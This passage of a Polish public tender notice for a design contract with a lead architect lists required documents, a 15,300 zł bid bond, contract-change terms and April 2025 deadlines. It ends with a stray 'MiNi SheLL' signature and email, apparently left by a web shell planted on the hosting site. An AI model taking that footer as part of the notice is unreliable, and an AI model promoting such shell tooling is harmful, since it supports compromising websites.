kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. 2023 poz. 1497).<br/>2. Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2021 r. poz. 275), z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej.<br/>UWAGA: Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy, przedstawienia podmiotowego<br/>środka dowodowego, o którym mowa w pkt 1. dotyczącego tych podmiotów, potwierdzającego, że nie zachodzą wobec tych<br/>podmiotów podstawy wykluczenia z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.<br/>Wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane, oraz<br/>załączeniem dowodów określających, czy te usługi zostały wykonane należycie.<br/>Dowodami, o których mowa, są:<br/>- Referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane;<br/>- Jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy.<br/>UWAGA: Okres 3 lat liczy się wstecz od dnia, w którym upływa termin składania ofert.<br/>2. Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz kryterium oceny ofert dotyczący doświadczenia architekta prowadzącego, jeśli Wykonawca ubiega się o punkty<br/>w tym kryterium (wzór załącznik nr 2 do SWZ)- dokument składany wraz z ofertą.<br/>2. Odpis lub informacja z KRS, CEIDG lub innego rejestru (jeśli dotyczy).<br/>3. Pełnomocnictwo (jeśli dotyczy).<br/>4. Zobowiązanie podmiotu udostępniającego zasoby (jeśli dotyczy).( wzór załącznik nr 7 do SWZ) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przystępując do niniejszego postępowania o udzielenie zamówienia, Wykonawca zobowiązany jest do wniesienia wadium w<br/>wysokości 15 300,00 zł (słownie: piętnaście tysięcy trzysta złotych). Wadium musi zostać skutecznie wniesione do upływu<br/>terminu składania ofert. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oferta wspólna:<br/>1. Wykonawcy składający ofertę wspólną muszą ustanowić pełnomocnika.<br/>2. Każdy z Wykonawców wspólnie składających ofertę musi wykazać brak podstaw wykluczenia.<br/>3. W przypadku korzystania z zasobów podmiotów trzecich należy dołączyć odpowiednie oświadczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje, na podstawie art. 455 ust. 1 pkt 1 ustawy Pzp, możliwość dokonywania zmian postanowień<br/>niniejszej Umowy w zakresie:<br/>1) zmiany terminu wykonania przedmiotu umowy w przypadku:a) zmiany uwarunkowań formalno-prawnych na etapie projektowania i uzgodnień dokumentacji z przyczyn niezależnych od<br/>obu stron,<br/>b) konieczności przeprowadzenia dodatkowych badań, ekspertyz, analiz itp.,<br/>c) opóźnień w działaniach organów administracji publicznej, które nie wynikają z zaniedbań Wykonawcy,<br/>d) opóźnień w wydawaniu decyzji, zezwoleń lub uzgodnień przez organy administracji publicznej, które przekraczają<br/>ustawowe terminy,<br/>e) wystąpienia siły wyższej, rozumianej jako zdarzenie zewnętrzne, niezależne od stron, którego nie można było<br/>przewidzieć ani zapobiec, w szczególności klęski żywiołowe, zamieszki, strajki, akty terrorystyczne, działania wojenne, akty<br/>władzy państwowej lub inne okoliczności uniemożliwiające realizację umowy,<br/>f) przyczyn niezależnych od stron, których nie można było uniknąć ani przewidzieć,<br/>g) konieczności wprowadzenia dodatkowych opracowań lub zamiennych rozwiązań wynikających z nieprzewidzianych<br/>uwarunkowań technicznych lub formalno-prawnych.<br/>2) zmiany wysokości wynagrodzenia Wykonawcy w zakresie i na zasadach określonych w paragrafie 13 umowy:<br/>a) zmiany cen materiałów i kosztów realizacji zamówienia,<br/>b) zmiany wysokości minimalnego wynagrodzenia za pracę lub minimalnej stawki godzinowej,<br/>c) zmiany wysokości składek na ubezpieczenie społeczne lub zdrowotne<br/>d) zmiany stawek podatku VAT lub podatku akcyzowego,<br/>3) zmiany sposobu realizacji przedmiotu umowy w przypadku:<br/>a) wprowadzenia rozwiązań korzystnych dla Zamawiającego,<br/>b) konieczności dostosowania zakresu zamówienia do zaistniałych uwarunkowań technicznych lub formalno-prawnych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-10 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem interaktywnego formularz oferty udostepnionego na Platformie e-Zamówienia.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-10 12:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-09</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com